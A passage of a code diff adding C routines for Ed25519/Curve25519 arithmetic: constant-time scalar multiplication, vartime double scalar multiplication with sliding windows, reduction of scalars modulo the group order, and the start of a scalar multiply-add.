+  x25519_ge_p1p1_to_p3(h, &r);
+  for (i = 0; i < 64; i += 2) {
+    table_select(&t, i / 2, e[i]);
+    ge_madd(&r, h, &t);
+    x25519_ge_p1p1_to_p3(h, &r);
+  }
+}
+#endif
+static void cmov_cached(ge_cached *t, ge_cached *u, uint8_t b) {
+  fe_cmov(&t->YplusX, &u->YplusX, b);
+  fe_cmov(&t->YminusX, &u->YminusX, b);
+  fe_cmov(&t->Z, &u->Z, b);
+  fe_cmov(&t->T2d, &u->T2d, b);
+}
+// r = scalar * A.
+// where a = a[0]+256*a[1]+...+256^31 a[31].
+void x25519_ge_scalarmult(ge_p2 *r, const uint8_t *scalar, const ge_p3 *A) {
+  ge_p2 Ai_p2[8];
+  ge_cached Ai[16];
+  ge_p1p1 t;
+  ge_cached_0(&Ai[0]);
+  x25519_ge_p3_to_cached(&Ai[1], A);
+  ge_p3_to_p2(&Ai_p2[1], A);
+  unsigned i;
+  for (i = 2; i < 16; i += 2) {
+    ge_p2_dbl(&t, &Ai_p2[i / 2]);
+    ge_p1p1_to_cached(&Ai[i], &t);
+    if (i < 8) {
+      x25519_ge_p1p1_to_p2(&Ai_p2[i], &t);
+    }
+    x25519_ge_add(&t, A, &Ai[i]);
+    ge_p1p1_to_cached(&Ai[i + 1], &t);
+    if (i < 7) {
+      x25519_ge_p1p1_to_p2(&Ai_p2[i + 1], &t);
+    }
+  }
+  ge_p2_0(r);
+  ge_p3 u;
+  for (i = 0; i < 256; i += 4) {
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p2(r, &t);
+    ge_p2_dbl(&t, r);
+    x25519_ge_p1p1_to_p3(&u, &t);
+    uint8_t index = scalar[31 - i/8];
+    index >>= 4 - (i & 4);
+    index &= 0xf;
+    unsigned j;
+    ge_cached selected;
+    ge_cached_0(&selected);
+    for (j = 0; j < 16; j++) {
+      cmov_cached(&selected, &Ai[j], equal(j, index));
+    }
+    x25519_ge_add(&t, &u, &selected);
+    x25519_ge_p1p1_to_p2(r, &t);
+  }
+}
+static void slide(signed char *r, const uint8_t *a) {
+  int i;
+  int b;
+  int k;
+  for (i = 0; i < 256; ++i) {
+    r[i] = 1 & (a[i >> 3] >> (i & 7));
+  }
+  for (i = 0; i < 256; ++i) {
+    if (r[i]) {
+      for (b = 1; b <= 6 && i + b < 256; ++b) {
+        if (r[i + b]) {
+          if (r[i] + (r[i + b] << b) <= 15) {
+            r[i] += r[i + b] << b;
+            r[i + b] = 0;
+          } else if (r[i] - (r[i + b] << b) >= -15) {
+            r[i] -= r[i + b] << b;
+            for (k = i + b; k < 256; ++k) {
+              if (!r[k]) {
+                r[k] = 1;
+                break;
+              }
+              r[k] = 0;
+            }
+          } else {
+            break;
+          }
+        }
+      }
+    }
+  }
+}
+// r = a * A + b * B
+// where a = a[0]+256*a[1]+...+256^31 a[31].
+// and b = b[0]+256*b[1]+...+256^31 b[31].
+// B is the Ed25519 base point (x,4/5) with x positive.
+static void ge_double_scalarmult_vartime(ge_p2 *r, const uint8_t *a,
+                                         const ge_p3 *A, const uint8_t *b) {
+  signed char aslide[256];
+  signed char bslide[256];
+  ge_cached Ai[8];  // A,3A,5A,7A,9A,11A,13A,15A
+  ge_p1p1 t;
+  ge_p3 u;
+  ge_p3 A2;
+  int i;
+  slide(aslide, a);
+  slide(bslide, b);
+  x25519_ge_p3_to_cached(&Ai[0], A);
+  ge_p3_dbl(&t, A);
+  x25519_ge_p1p1_to_p3(&A2, &t);
+  x25519_ge_add(&t, &A2, &Ai[0]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[1], &u);
+  x25519_ge_add(&t, &A2, &Ai[1]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[2], &u);
+  x25519_ge_add(&t, &A2, &Ai[2]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[3], &u);
+  x25519_ge_add(&t, &A2, &Ai[3]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[4], &u);
+  x25519_ge_add(&t, &A2, &Ai[4]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[5], &u);
+  x25519_ge_add(&t, &A2, &Ai[5]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[6], &u);
+  x25519_ge_add(&t, &A2, &Ai[6]);
+  x25519_ge_p1p1_to_p3(&u, &t);
+  x25519_ge_p3_to_cached(&Ai[7], &u);
+  ge_p2_0(r);
+  for (i = 255; i >= 0; --i) {
+    if (aslide[i] || bslide[i]) {
+      break;
+    }
+  }
+  for (; i >= 0; --i) {
+    ge_p2_dbl(&t, r);
+    if (aslide[i] > 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      x25519_ge_add(&t, &u, &Ai[aslide[i] / 2]);
+    } else if (aslide[i] < 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      x25519_ge_sub(&t, &u, &Ai[(-aslide[i]) / 2]);
+    }
+    if (bslide[i] > 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      ge_madd(&t, &u, &Bi[bslide[i] / 2]);
+    } else if (bslide[i] < 0) {
+      x25519_ge_p1p1_to_p3(&u, &t);
+      ge_msub(&t, &u, &Bi[(-bslide[i]) / 2]);
+    }
+    x25519_ge_p1p1_to_p2(r, &t);
+  }
+}
+// int64_lshift21 returns |a << 21| but is defined when shifting bits into the
+// sign bit. This works around a language flaw in C.
+static inline int64_t int64_lshift21(int64_t a) {
+  return (int64_t)((uint64_t)a << 21);
+}
+// The set of scalars is \Z/l
+// where l = 2^252 + 27742317777372353535851937790883648493.
+// Input:
+//   s[0]+256*s[1]+...+256^63*s[63] = s
+//
+// Output:
+//   s[0]+256*s[1]+...+256^31*s[31] = s mod l
+//   where l = 2^252 + 27742317777372353535851937790883648493.
+//   Overwrites s in place.
+void x25519_sc_reduce(uint8_t s[64]) {
+  int64_t s0 = 2097151 & load_3(s);
+  int64_t s1 = 2097151 & (load_4(s + 2) >> 5);
+  int64_t s2 = 2097151 & (load_3(s + 5) >> 2);
+  int64_t s3 = 2097151 & (load_4(s + 7) >> 7);
+  int64_t s4 = 2097151 & (load_4(s + 10) >> 4);
+  int64_t s5 = 2097151 & (load_3(s + 13) >> 1);
+  int64_t s6 = 2097151 & (load_4(s + 15) >> 6);
+  int64_t s7 = 2097151 & (load_3(s + 18) >> 3);
+  int64_t s8 = 2097151 & load_3(s + 21);
+  int64_t s9 = 2097151 & (load_4(s + 23) >> 5);
+  int64_t s10 = 2097151 & (load_3(s + 26) >> 2);
+  int64_t s11 = 2097151 & (load_4(s + 28) >> 7);
+  int64_t s12 = 2097151 & (load_4(s + 31) >> 4);
+  int64_t s13 = 2097151 & (load_3(s + 34) >> 1);
+  int64_t s14 = 2097151 & (load_4(s + 36) >> 6);
+  int64_t s15 = 2097151 & (load_3(s + 39) >> 3);
+  int64_t s16 = 2097151 & load_3(s + 42);
+  int64_t s17 = 2097151 & (load_4(s + 44) >> 5);
+  int64_t s18 = 2097151 & (load_3(s + 47) >> 2);
+  int64_t s19 = 2097151 & (load_4(s + 49) >> 7);
+  int64_t s20 = 2097151 & (load_4(s + 52) >> 4);
+  int64_t s21 = 2097151 & (load_3(s + 55) >> 1);
+  int64_t s22 = 2097151 & (load_4(s + 57) >> 6);
+  int64_t s23 = (load_4(s + 60) >> 3);
+  int64_t carry0;
+  int64_t carry1;
+  int64_t carry2;
+  int64_t carry3;
+  int64_t carry4;
+  int64_t carry5;
+  int64_t carry6;
+  int64_t carry7;
+  int64_t carry8;
+  int64_t carry9;
+  int64_t carry10;
+  int64_t carry11;
+  int64_t carry12;
+  int64_t carry13;
+  int64_t carry14;
+  int64_t carry15;
+  int64_t carry16;
+  s11 += s23 * 666643;
+  s12 += s23 * 470296;
+  s13 += s23 * 654183;
+  s14 -= s23 * 997805;
+  s15 += s23 * 136657;
+  s16 -= s23 * 683901;
+  s23 = 0;
+  s10 += s22 * 666643;
+  s11 += s22 * 470296;
+  s12 += s22 * 654183;
+  s13 -= s22 * 997805;
+  s14 += s22 * 136657;
+  s15 -= s22 * 683901;
+  s22 = 0;
+  s9 += s21 * 666643;
+  s10 += s21 * 470296;
+  s11 += s21 * 654183;
+  s12 -= s21 * 997805;
+  s13 += s21 * 136657;
+  s14 -= s21 * 683901;
+  s21 = 0;
+  s8 += s20 * 666643;
+  s9 += s20 * 470296;
+  s10 += s20 * 654183;
+  s11 -= s20 * 997805;
+  s12 += s20 * 136657;
+  s13 -= s20 * 683901;
+  s20 = 0;
+  s7 += s19 * 666643;
+  s8 += s19 * 470296;
+  s9 += s19 * 654183;
+  s10 -= s19 * 997805;
+  s11 += s19 * 136657;
+  s12 -= s19 * 683901;
+  s19 = 0;
+  s6 += s18 * 666643;
+  s7 += s18 * 470296;
+  s8 += s18 * 654183;
+  s9 -= s18 * 997805;
+  s10 += s18 * 136657;
+  s11 -= s18 * 683901;
+  s18 = 0;
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  s5 += s17 * 666643;
+  s6 += s17 * 470296;
+  s7 += s17 * 654183;
+  s8 -= s17 * 997805;
+  s9 += s17 * 136657;
+  s10 -= s17 * 683901;
+  s17 = 0;
+  s4 += s16 * 666643;
+  s5 += s16 * 470296;
+  s6 += s16 * 654183;
+  s7 -= s16 * 997805;
+  s8 += s16 * 136657;
+  s9 -= s16 * 683901;
+  s16 = 0;
+  s3 += s15 * 666643;
+  s4 += s15 * 470296;
+  s5 += s15 * 654183;
+  s6 -= s15 * 997805;
+  s7 += s15 * 136657;
+  s8 -= s15 * 683901;
+  s15 = 0;
+  s2 += s14 * 666643;
+  s3 += s14 * 470296;
+  s4 += s14 * 654183;
+  s5 -= s14 * 997805;
+  s6 += s14 * 136657;
+  s7 -= s14 * 683901;
+  s14 = 0;
+  s1 += s13 * 666643;
+  s2 += s13 * 470296;
+  s3 += s13 * 654183;
+  s4 -= s13 * 997805;
+  s5 += s13 * 136657;
+  s6 -= s13 * 683901;
+  s13 = 0;
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = (s0 + (1 << 20)) >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry1 = (s1 + (1 << 20)) >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry11 = s11 >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = s0 >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry1 = s1 >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry2 = s2 >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry3 = s3 >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry4 = s4 >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry5 = s5 >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry6 = s6 >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry7 = s7 >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry8 = s8 >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry9 = s9 >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry10 = s10 >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  s[0] = s0 >> 0;
+  s[1] = s0 >> 8;
+  s[2] = (s0 >> 16) | (s1 << 5);
+  s[3] = s1 >> 3;
+  s[4] = s1 >> 11;
+  s[5] = (s1 >> 19) | (s2 << 2);
+  s[6] = s2 >> 6;
+  s[7] = (s2 >> 14) | (s3 << 7);
+  s[8] = s3 >> 1;
+  s[9] = s3 >> 9;
+  s[10] = (s3 >> 17) | (s4 << 4);
+  s[11] = s4 >> 4;
+  s[12] = s4 >> 12;
+  s[13] = (s4 >> 20) | (s5 << 1);
+  s[14] = s5 >> 7;
+  s[15] = (s5 >> 15) | (s6 << 6);
+  s[16] = s6 >> 2;
+  s[17] = s6 >> 10;
+  s[18] = (s6 >> 18) | (s7 << 3);
+  s[19] = s7 >> 5;
+  s[20] = s7 >> 13;
+  s[21] = s8 >> 0;
+  s[22] = s8 >> 8;
+  s[23] = (s8 >> 16) | (s9 << 5);
+  s[24] = s9 >> 3;
+  s[25] = s9 >> 11;
+  s[26] = (s9 >> 19) | (s10 << 2);
+  s[27] = s10 >> 6;
+  s[28] = (s10 >> 14) | (s11 << 7);
+  s[29] = s11 >> 1;
+  s[30] = s11 >> 9;
+  s[31] = s11 >> 17;
+}
+// Input:
+//   a[0]+256*a[1]+...+256^31*a[31] = a
+//   b[0]+256*b[1]+...+256^31*b[31] = b
+//   c[0]+256*c[1]+...+256^31*c[31] = c
+//
+// Output:
+//   s[0]+256*s[1]+...+256^31*s[31] = (ab+c) mod l
+//   where l = 2^252 + 27742317777372353535851937790883648493.
+static void sc_muladd(uint8_t *s, const uint8_t *a, const uint8_t *b,
+                      const uint8_t *c) {
+  int64_t a0 = 2097151 & load_3(a);
+  int64_t a1 = 2097151 & (load_4(a + 2) >> 5);
+  int64_t a2 = 2097151 & (load_3(a + 5) >> 2);
+  int64_t a3 = 2097151 & (load_4(a + 7) >> 7);
+  int64_t a4 = 2097151 & (load_4(a + 10) >> 4);
+  int64_t a5 = 2097151 & (load_3(a + 13) >> 1);
+  int64_t a6 = 2097151 & (load_4(a + 15) >> 6);
+  int64_t a7 = 2097151 & (load_3(a + 18) >> 3);
+  int64_t a8 = 2097151 & load_3(a + 21);
+  int64_t a9 = 2097151 & (load_4(a + 23) >> 5);
+  int64_t a10 = 2097151 & (load_3(a + 26) >> 2);
+  int64_t a11 = (load_4(a + 28) >> 7);
+  int64_t b0 = 2097151 & load_3(b);
+  int64_t b1 = 2097151 & (load_4(b + 2) >> 5);
+  int64_t b2 = 2097151 & (load_3(b + 5) >> 2);
+  int64_t b3 = 2097151 & (load_4(b + 7) >> 7);
+  int64_t b4 = 2097151 & (load_4(b + 10) >> 4);
+  int64_t b5 = 2097151 & (load_3(b + 13) >> 1);
+  int64_t b6 = 2097151 & (load_4(b + 15) >> 6);
+  int64_t b7 = 2097151 & (load_3(b + 18) >> 3);
+  int64_t b8 = 2097151 & load_3(b + 21);
+  int64_t b9 = 2097151 & (load_4(b + 23) >> 5);
+  int64_t b10 = 2097151 & (load_3(b + 26) >> 2);
+  int64_t b11 = (load_4(b + 28) >> 7);
+  int64_t c0 = 2097151 & load_3(c);
+  int64_t c1 = 2097151 & (load_4(c + 2) >> 5);
+  int64_t c2 = 2097151 & (load_3(c + 5) >> 2);
+  int64_t c3 = 2097151 & (load_4(c + 7) >> 7);
+  int64_t c4 = 2097151 & (load_4(c + 10) >> 4);
+  int64_t c5 = 2097151 & (load_3(c + 13) >> 1);
+  int64_t c6 = 2097151 & (load_4(c + 15) >> 6);
+  int64_t c7 = 2097151 & (load_3(c + 18) >> 3);
+  int64_t c8 = 2097151 & load_3(c + 21);
+  int64_t c9 = 2097151 & (load_4(c + 23) >> 5);
+  int64_t c10 = 2097151 & (load_3(c + 26) >> 2);
+  int64_t c11 = (load_4(c + 28) >> 7);
+  int64_t s0;
+  int64_t s1;
+  int64_t s2;
+  int64_t s3;
+  int64_t s4;
+  int64_t s5;
+  int64_t s6;
+  int64_t s7;
+  int64_t s8;
+  int64_t s9;
+  int64_t s10;
+  int64_t s11;
+  int64_t s12;
+  int64_t s13;
+  int64_t s14;
+  int64_t s15;
+  int64_t s16;
+  int64_t s17;
+  int64_t s18;
+  int64_t s19;
+  int64_t s20;
+  int64_t s21;
+  int64_t s22;
+  int64_t s23;
+  int64_t carry0;
+  int64_t carry1;
+  int64_t carry2;
+  int64_t carry3;
+  int64_t carry4;
+  int64_t carry5;
+  int64_t carry6;
+  int64_t carry7;
+  int64_t carry8;
+  int64_t carry9;
+  int64_t carry10;
+  int64_t carry11;
+  int64_t carry12;
+  int64_t carry13;
+  int64_t carry14;
+  int64_t carry15;
+  int64_t carry16;
+  int64_t carry17;
+  int64_t carry18;
+  int64_t carry19;
+  int64_t carry20;
+  int64_t carry21;
+  int64_t carry22;
+  s0 = c0 + a0 * b0;
+  s1 = c1 + a0 * b1 + a1 * b0;
+  s2 = c2 + a0 * b2 + a1 * b1 + a2 * b0;
+  s3 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0;
+  s4 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0;
+  s5 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0;
+  s6 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0;
+  s7 = c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 +
+       a6 * b1 + a7 * b0;
+  s8 = c8 + a0 * b8 + a1 * b7 + a2 * b6 + a3 * b5 + a4 * b4 + a5 * b3 +
+       a6 * b2 + a7 * b1 + a8 * b0;
+  s9 = c9 + a0 * b9 + a1 * b8 + a2 * b7 + a3 * b6 + a4 * b5 + a5 * b4 +
+       a6 * b3 + a7 * b2 + a8 * b1 + a9 * b0;
+  s10 = c10 + a0 * b10 + a1 * b9 + a2 * b8 + a3 * b7 + a4 * b6 + a5 * b5 +
+        a6 * b4 + a7 * b3 + a8 * b2 + a9 * b1 + a10 * b0;
+  s11 = c11 + a0 * b11 + a1 * b10 + a2 * b9 + a3 * b8 + a4 * b7 + a5 * b6 +
+        a6 * b5 + a7 * b4 + a8 * b3 + a9 * b2 + a10 * b1 + a11 * b0;
+  s12 = a1 * b11 + a2 * b10 + a3 * b9 + a4 * b8 + a5 * b7 + a6 * b6 + a7 * b5 +
+        a8 * b4 + a9 * b3 + a10 * b2 + a11 * b1;
+  s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + a8 * b5 +
+        a9 * b4 + a10 * b3 + a11 * b2;
+  s14 = a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 +
+        a10 * b4 + a11 * b3;
+  s15 = a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 +
+        a11 * b4;
+  s16 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5;
+  s17 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6;
+  s18 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7;
+  s19 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8;
+  s20 = a9 * b11 + a10 * b10 + a11 * b9;
+  s21 = a10 * b11 + a11 * b10;
+  s22 = a11 * b11;
+  s23 = 0;
+  carry0 = (s0 + (1 << 20)) >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
+  s4 -= int64_lshift21(carry4);
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry18 = (s18 + (1 << 20)) >> 21;
+  s19 += carry18;
+  s18 -= int64_lshift21(carry18);
+  carry20 = (s20 + (1 << 20)) >> 21;
+  s21 += carry20;
+  s20 -= int64_lshift21(carry20);
+  carry22 = (s22 + (1 << 20)) >> 21;
+  s23 += carry22;
+  s22 -= int64_lshift21(carry22);
+  carry1 = (s1 + (1 << 20)) >> 21;
+  s2 += carry1;
+  s1 -= int64_lshift21(carry1);
+  carry3 = (s3 + (1 << 20)) >> 21;
+  s4 += carry3;
+  s3 -= int64_lshift21(carry3);
+  carry5 = (s5 + (1 << 20)) >> 21;
+  s6 += carry5;
+  s5 -= int64_lshift21(carry5);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  carry17 = (s17 + (1 << 20)) >> 21;
+  s18 += carry17;
+  s17 -= int64_lshift21(carry17);
+  carry19 = (s19 + (1 << 20)) >> 21;
+  s20 += carry19;
+  s19 -= int64_lshift21(carry19);
+  carry21 = (s21 + (1 << 20)) >> 21;
+  s22 += carry21;
+  s21 -= int64_lshift21(carry21);
+  s11 += s23 * 666643;
+  s12 += s23 * 470296;
+  s13 += s23 * 654183;
+  s14 -= s23 * 997805;
+  s15 += s23 * 136657;
+  s16 -= s23 * 683901;
+  s23 = 0;
+  s10 += s22 * 666643;
+  s11 += s22 * 470296;
+  s12 += s22 * 654183;
+  s13 -= s22 * 997805;
+  s14 += s22 * 136657;
+  s15 -= s22 * 683901;
+  s22 = 0;
+  s9 += s21 * 666643;
+  s10 += s21 * 470296;
+  s11 += s21 * 654183;
+  s12 -= s21 * 997805;
+  s13 += s21 * 136657;
+  s14 -= s21 * 683901;
+  s21 = 0;
+  s8 += s20 * 666643;
+  s9 += s20 * 470296;
+  s10 += s20 * 654183;
+  s11 -= s20 * 997805;
+  s12 += s20 * 136657;
+  s13 -= s20 * 683901;
+  s20 = 0;
+  s7 += s19 * 666643;
+  s8 += s19 * 470296;
+  s9 += s19 * 654183;
+  s10 -= s19 * 997805;
+  s11 += s19 * 136657;
+  s12 -= s19 * 683901;
+  s19 = 0;
+  s6 += s18 * 666643;
+  s7 += s18 * 470296;
+  s8 += s18 * 654183;
+  s9 -= s18 * 997805;
+  s10 += s18 * 136657;
+  s11 -= s18 * 683901;
+  s18 = 0;
+  carry6 = (s6 + (1 << 20)) >> 21;
+  s7 += carry6;
+  s6 -= int64_lshift21(carry6);
+  carry8 = (s8 + (1 << 20)) >> 21;
+  s9 += carry8;
+  s8 -= int64_lshift21(carry8);
+  carry10 = (s10 + (1 << 20)) >> 21;
+  s11 += carry10;
+  s10 -= int64_lshift21(carry10);
+  carry12 = (s12 + (1 << 20)) >> 21;
+  s13 += carry12;
+  s12 -= int64_lshift21(carry12);
+  carry14 = (s14 + (1 << 20)) >> 21;
+  s15 += carry14;
+  s14 -= int64_lshift21(carry14);
+  carry16 = (s16 + (1 << 20)) >> 21;
+  s17 += carry16;
+  s16 -= int64_lshift21(carry16);
+  carry7 = (s7 + (1 << 20)) >> 21;
+  s8 += carry7;
+  s7 -= int64_lshift21(carry7);
+  carry9 = (s9 + (1 << 20)) >> 21;
+  s10 += carry9;
+  s9 -= int64_lshift21(carry9);
+  carry11 = (s11 + (1 << 20)) >> 21;
+  s12 += carry11;
+  s11 -= int64_lshift21(carry11);
+  carry13 = (s13 + (1 << 20)) >> 21;
+  s14 += carry13;
+  s13 -= int64_lshift21(carry13);
+  carry15 = (s15 + (1 << 20)) >> 21;
+  s16 += carry15;
+  s15 -= int64_lshift21(carry15);
+  s5 += s17 * 666643;
+  s6 += s17 * 470296;
+  s7 += s17 * 654183;
+  s8 -= s17 * 997805;
+  s9 += s17 * 136657;
+  s10 -= s17 * 683901;
+  s17 = 0;
+  s4 += s16 * 666643;
+  s5 += s16 * 470296;
+  s6 += s16 * 654183;
+  s7 -= s16 * 997805;
+  s8 += s16 * 136657;
+  s9 -= s16 * 683901;
+  s16 = 0;
+  s3 += s15 * 666643;
+  s4 += s15 * 470296;
+  s5 += s15 * 654183;
+  s6 -= s15 * 997805;
+  s7 += s15 * 136657;
+  s8 -= s15 * 683901;
+  s15 = 0;
+  s2 += s14 * 666643;
+  s3 += s14 * 470296;
+  s4 += s14 * 654183;
+  s5 -= s14 * 997805;
+  s6 += s14 * 136657;
+  s7 -= s14 * 683901;
+  s14 = 0;
+  s1 += s13 * 666643;
+  s2 += s13 * 470296;
+  s3 += s13 * 654183;
+  s4 -= s13 * 997805;
+  s5 += s13 * 136657;
+  s6 -= s13 * 683901;
+  s13 = 0;
+  s0 += s12 * 666643;
+  s1 += s12 * 470296;
+  s2 += s12 * 654183;
+  s3 -= s12 * 997805;
+  s4 += s12 * 136657;
+  s5 -= s12 * 683901;
+  s12 = 0;
+  carry0 = (s0 + (1 << 20)) >> 21;
+  s1 += carry0;
+  s0 -= int64_lshift21(carry0);
+  carry2 = (s2 + (1 << 20)) >> 21;
+  s3 += carry2;
+  s2 -= int64_lshift21(carry2);
+  carry4 = (s4 + (1 << 20)) >> 21;
+  s5 += carry4;
